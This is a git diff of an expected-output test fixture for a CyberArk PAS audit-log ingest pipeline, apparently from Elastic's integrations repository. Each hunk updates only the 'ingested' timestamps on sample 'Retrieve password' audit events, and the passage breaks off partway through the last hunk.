diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json index 4ef2367ad25..b470772f336 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json 
@@ -68,7 +68,7 @@ "event": { "severity": 2, "reason": "AIM password request", - "ingested": "2021-06-09T10:24:30.560288800Z", + "ingested": "2021-12-09T13:36:45.560089Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eProv_PVWA\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.3\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAIM password request\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Nobody\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_PVWA\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.3\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"AIM password request\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Nobody\"}]}}}}", "code": "295", "kind": "event", 
@@ -168,7 +168,7 @@ "event": { "severity": 2, "reason": "(Action: Show Password)", - "ingested": "2021-06-09T10:24:30.560304700Z", + "ingested": "2021-12-09T13:36:45.560097600Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Show Password)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eShow Password\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Show Password)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Show Password\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "295", "kind": "event", @@ -262,7 +262,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-06-09T10:24:30.560341600Z", + "ingested": "2021-12-09T13:36:45.560103300Z", "original": "\u003c5\u003e1 2021-03-08T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:16:51\",\"IsoTimestamp\":\"2021-03-08T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\testobject\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"test\"},{\"Name\":\"Address\",\"Value\":\"test\"},{\"Name\":\"CPMDisabled\",\"Value\":\"testing\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", 
@@ -368,7 +368,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560350300Z", + "ingested": "2021-12-09T13:36:45.560112Z", "original": "\u003c5\u003e1 2021-03-08T19:19:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:19:59\",\"IsoTimestamp\":\"2021-03-08T19:19:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -454,7 +454,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560354200Z", + "ingested": "2021-12-09T13:36:45.560117600Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "295", "kind": "event", 
@@ -556,7 +556,7 @@ "event": { "severity": 2, "reason": "Application provider background refresh job", - "ingested": "2021-06-09T10:24:30.560357600Z", + "ingested": "2021-12-09T13:36:45.560123100Z", "original": "\u003c5\u003e1 2021-03-10T14:40:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:40:37\",\"IsoTimestamp\":\"2021-03-10T14:40:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Application provider background refresh job\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -651,7 +651,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-06-09T10:24:30.560361Z", + "ingested": "2021-12-09T13:36:45.560128600Z", "original": "\u003c5\u003e1 2021-03-10T18:27:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:27:57\",\"IsoTimestamp\":\"2021-03-10T18:27:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -746,7 +746,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-06-09T10:24:30.560363700Z", + "ingested": "2021-12-09T13:36:45.560134100Z", "original": "\u003c5\u003e1 2021-03-10T18:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:28:07\",\"IsoTimestamp\":\"2021-03-10T18:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -852,7 +852,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-06-09T10:24:30.560366500Z", + "ingested": "2021-12-09T13:36:45.560139700Z", "original": "\u003c5\u003e1 2021-03-10T23:39:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:22\",\"IsoTimestamp\":\"2021-03-10T23:39:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -938,7 +938,7 @@
 "event": {
 "severity": 2,
 "reason": "CPM",
- "ingested": "2021-06-09T10:24:30.560369200Z",
+ "ingested": "2021-12-09T13:36:45.560145600Z",
 "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}",
 "code": "295",
 "kind": "event",
@@ -1034,7 +1034,7 @@
 "event": {
 "severity": 2,
 "reason": "lksajdflkasdf",
- "ingested": "2021-06-09T10:24:30.560371700Z",
+ "ingested": "2021-12-09T13:36:45.560151200Z",
 "original": "\u003c5\u003e1 2021-03-11T16:41:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:41:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:41:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003elksajdflkasdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:41:21\",\"IsoTimestamp\":\"2021-03-11T16:41:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"lksajdflkasdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}",
 "code": "295",
 "kind": "event",
@@ -1128,7 +1128,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:30.560374500Z",
+ "ingested": "2021-12-09T13:36:45.560174600Z",
 "original": "\u003c5\u003e1 2021-03-11T16:50:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMServer\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
